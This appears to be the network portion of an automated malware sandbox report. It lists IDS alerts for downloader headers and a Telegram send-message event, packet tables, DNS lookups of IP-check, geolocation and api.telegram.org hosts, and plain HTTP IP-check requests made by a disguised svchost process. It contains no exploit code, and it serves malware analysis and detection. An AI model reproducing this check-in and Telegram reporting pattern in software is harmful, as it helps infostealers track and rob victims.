                                                                                                                2025-01-10T20:33:25.338902+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704193.122.6.16880TCP
                                                                                                                2025-01-10T20:33:26.463942+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704193.122.6.16880TCP
                                                                                                                2025-01-10T20:33:27.075924+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549706104.21.32.1443TCP
                                                                                                                2025-01-10T20:33:27.760812+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707193.122.6.16880TCP
                                                                                                                2025-01-10T20:33:29.651049+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549710104.21.32.1443TCP
                                                                                                                2025-01-10T20:33:32.226356+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549714104.21.32.1443TCP
                                                                                                                2025-01-10T20:33:36.136220+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549720104.21.32.1443TCP
                                                                                                                2025-01-10T20:33:37.119743+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549721149.154.167.220443TCP
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 10, 2025 20:33:24.303668976 CET4970480192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:24.308444023 CET8049704193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:24.308518887 CET4970480192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:24.308908939 CET4970480192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:24.313648939 CET8049704193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:25.060013056 CET8049704193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:25.066540956 CET4970480192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:25.071346045 CET8049704193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:25.284145117 CET8049704193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:25.338901997 CET4970480192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:25.534066916 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:25.534121037 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:25.534471035 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:25.568671942 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:25.568717957 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:26.043091059 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:26.043207884 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:26.048732996 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:26.048757076 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:26.048989058 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:26.095829010 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:26.139336109 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:26.207535028 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:26.207633972 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:26.207704067 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:26.213872910 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:26.229993105 CET4970480192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:26.234836102 CET8049704193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:26.419132948 CET8049704193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:26.421598911 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:26.421648979 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:26.421717882 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:26.422054052 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:26.422065973 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:26.463942051 CET4970480192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:26.901709080 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:26.948293924 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:26.958126068 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:26.958147049 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:27.075900078 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:27.075956106 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:27.076004028 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:27.076478958 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:27.083611965 CET4970480192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:27.084760904 CET4970780192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:27.088650942 CET8049704193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:27.088709116 CET4970480192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:27.089579105 CET8049707193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:27.089732885 CET4970780192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:27.089777946 CET4970780192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:27.094522953 CET8049707193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:27.716701984 CET8049707193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:27.718372107 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:27.718472004 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:27.718581915 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:27.718837023 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:27.718857050 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:27.760812044 CET4970780192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:28.200846910 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:28.202547073 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:28.202636003 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:28.375550032 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:28.375598907 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:28.375699043 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:28.376194954 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:28.383893013 CET4970980192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:28.388773918 CET8049709193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:28.388858080 CET4970980192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:28.388926029 CET4970980192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:28.393771887 CET8049709193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:29.014178991 CET8049709193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:29.015578032 CET49710443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:29.015680075 CET44349710104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:29.015770912 CET49710443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:29.016011953 CET49710443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:29.016041994 CET44349710104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:29.057714939 CET4970980192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:29.499308109 CET44349710104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:29.500897884 CET49710443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:29.500977993 CET44349710104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:29.650937080 CET44349710104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:29.650994062 CET44349710104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:29.651068926 CET49710443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:29.651839018 CET49710443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:29.655327082 CET4970980192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:29.656084061 CET4971180192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:29.660351038 CET8049709193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:29.660438061 CET4970980192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:29.660916090 CET8049711193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:29.660991907 CET4971180192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:29.661083937 CET4971180192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:29.665879965 CET8049711193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:30.322871923 CET8049711193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:30.324579000 CET49712443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:30.324645042 CET44349712104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:30.324774981 CET49712443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:30.325004101 CET49712443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:30.325022936 CET44349712104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:30.370193958 CET4971180192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:30.790832996 CET44349712104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:30.793100119 CET49712443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:30.793184996 CET44349712104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:30.939838886 CET44349712104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:30.939918041 CET44349712104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:30.940073013 CET49712443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:30.940702915 CET49712443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:30.944164991 CET4971180192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:30.945353031 CET4971380192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:30.949183941 CET8049711193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:30.949249029 CET4971180192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:30.950206995 CET8049713193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:30.950313091 CET4971380192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:30.950385094 CET4971380192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:30.955147028 CET8049713193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:31.614132881 CET8049713193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:31.615814924 CET49714443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:31.615866899 CET44349714104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:31.615928888 CET49714443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:31.616313934 CET49714443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:31.616327047 CET44349714104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:31.667062998 CET4971380192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:32.074527979 CET44349714104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:32.076081991 CET49714443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:32.076136112 CET44349714104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:32.226377010 CET44349714104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:32.226434946 CET44349714104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:32.226655006 CET49714443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:32.227169991 CET49714443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:32.236202955 CET4971380192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:32.237534046 CET4971580192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:32.241481066 CET8049713193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:32.241673946 CET4971380192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:32.242836952 CET8049715193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:32.242908955 CET4971580192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:32.243037939 CET4971580192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:32.248076916 CET8049715193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:32.898109913 CET8049715193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:32.901076078 CET49716443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:32.901107073 CET44349716104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:32.901259899 CET49716443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:32.903332949 CET49716443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:32.903343916 CET44349716104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:32.948292971 CET4971580192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:33.377621889 CET44349716104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:33.379328966 CET49716443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:33.379352093 CET44349716104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:33.525302887 CET44349716104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:33.525361061 CET44349716104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:33.525408030 CET49716443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:33.525844097 CET49716443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:33.529766083 CET4971580192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:33.530390024 CET4971780192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:33.534828901 CET8049715193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:33.534881115 CET4971580192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:33.535233974 CET8049717193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:33.535300016 CET4971780192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:33.535388947 CET4971780192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:33.540131092 CET8049717193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:34.264484882 CET8049717193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:34.265958071 CET49718443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:34.265985966 CET44349718104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:34.266133070 CET49718443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:34.266383886 CET49718443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:34.266396999 CET44349718104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:34.307815075 CET4971780192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:34.721924067 CET44349718104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:34.723751068 CET49718443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:34.723788023 CET44349718104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:34.864881039 CET44349718104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:34.864944935 CET44349718104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:34.865345955 CET49718443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:34.865726948 CET49718443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:34.868654966 CET4971780192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:34.869810104 CET4971980192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:34.874063969 CET8049717193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:34.874176025 CET4971780192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:34.874690056 CET8049719193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:34.874756098 CET4971980192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:34.874850988 CET4971980192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:34.879710913 CET8049719193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:35.518769026 CET8049719193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:35.521656990 CET49720443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:35.521708012 CET44349720104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:35.521776915 CET49720443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:35.521989107 CET49720443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:35.522001982 CET44349720104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:35.573374987 CET4971980192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:35.992571115 CET44349720104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:35.995361090 CET49720443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:35.995378017 CET44349720104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:36.136274099 CET44349720104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:36.136360884 CET44349720104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:36.136539936 CET49720443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:36.137161016 CET49720443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 20:33:36.173732996 CET4971980192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:36.179218054 CET8049719193.122.6.168192.168.2.5
                                                                                                                Jan 10, 2025 20:33:36.179323912 CET4971980192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:36.181132078 CET49721443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 20:33:36.181171894 CET44349721149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 20:33:36.181258917 CET49721443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 20:33:36.181689024 CET49721443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 20:33:36.181705952 CET44349721149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 20:33:36.812020063 CET44349721149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 20:33:36.812225103 CET49721443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 20:33:36.815402031 CET49721443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 20:33:36.815413952 CET44349721149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 20:33:36.815691948 CET44349721149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 20:33:36.817641973 CET49721443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 20:33:36.859328032 CET44349721149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 20:33:37.119791031 CET44349721149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 20:33:37.119868040 CET44349721149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 20:33:37.119924068 CET49721443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 20:33:37.124453068 CET49721443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 20:33:43.078815937 CET4970780192.168.2.5193.122.6.168
                                                                                                                Jan 10, 2025 20:33:43.112504959 CET5790553192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 20:33:43.117458105 CET53579051.1.1.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:43.117552042 CET5790553192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 20:33:43.122396946 CET53579051.1.1.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:43.573518038 CET5790553192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 20:33:43.578610897 CET53579051.1.1.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:43.578711033 CET5790553192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 20:33:57.612236023 CET5862753192.168.2.5162.159.36.2
                                                                                                                Jan 10, 2025 20:33:57.617151022 CET5358627162.159.36.2192.168.2.5
                                                                                                                Jan 10, 2025 20:33:57.617239952 CET5862753192.168.2.5162.159.36.2
                                                                                                                Jan 10, 2025 20:33:57.622164011 CET5358627162.159.36.2192.168.2.5
                                                                                                                Jan 10, 2025 20:33:58.076338053 CET5862753192.168.2.5162.159.36.2
                                                                                                                Jan 10, 2025 20:33:58.081347942 CET5358627162.159.36.2192.168.2.5
                                                                                                                Jan 10, 2025 20:33:58.081403017 CET5862753192.168.2.5162.159.36.2
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 10, 2025 20:33:24.271351099 CET4991353192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 20:33:24.278984070 CET53499131.1.1.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:25.525523901 CET5077753192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 20:33:25.532893896 CET53507771.1.1.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:36.173640966 CET5773653192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 20:33:36.180408955 CET53577361.1.1.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:43.112003088 CET53491851.1.1.1192.168.2.5
                                                                                                                Jan 10, 2025 20:33:57.611712933 CET5356659162.159.36.2192.168.2.5
                                                                                                                Jan 10, 2025 20:33:58.083493948 CET5051453192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 20:33:58.090620995 CET53505141.1.1.1192.168.2.5
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Jan 10, 2025 20:33:24.271351099 CET192.168.2.51.1.1.10x46ecStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:25.525523901 CET192.168.2.51.1.1.10x5a36Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:36.173640966 CET192.168.2.51.1.1.10x5e0cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:58.083493948 CET192.168.2.51.1.1.10x2b99Standard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Jan 10, 2025 20:33:24.278984070 CET1.1.1.1192.168.2.50x46ecNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:24.278984070 CET1.1.1.1192.168.2.50x46ecNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:24.278984070 CET1.1.1.1192.168.2.50x46ecNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:24.278984070 CET1.1.1.1192.168.2.50x46ecNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:24.278984070 CET1.1.1.1192.168.2.50x46ecNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:24.278984070 CET1.1.1.1192.168.2.50x46ecNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:25.532893896 CET1.1.1.1192.168.2.50x5a36No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:25.532893896 CET1.1.1.1192.168.2.50x5a36No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:25.532893896 CET1.1.1.1192.168.2.50x5a36No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:25.532893896 CET1.1.1.1192.168.2.50x5a36No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:25.532893896 CET1.1.1.1192.168.2.50x5a36No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:25.532893896 CET1.1.1.1192.168.2.50x5a36No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:25.532893896 CET1.1.1.1192.168.2.50x5a36No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:36.180408955 CET1.1.1.1192.168.2.50x5e0cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                Jan 10, 2025 20:33:58.090620995 CET1.1.1.1192.168.2.50x2b99Name error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                • reallyfreegeoip.org
                                                                                                                • api.telegram.org
                                                                                                                • checkip.dyndns.org
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.549704193.122.6.16880428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 20:33:24.308908939 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 20:33:25.060013056 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:24 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Jan 10, 2025 20:33:25.066540956 CET127OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Jan 10, 2025 20:33:25.284145117 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:25 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                Jan 10, 2025 20:33:26.229993105 CET127OUTGET / HTTP/1.1
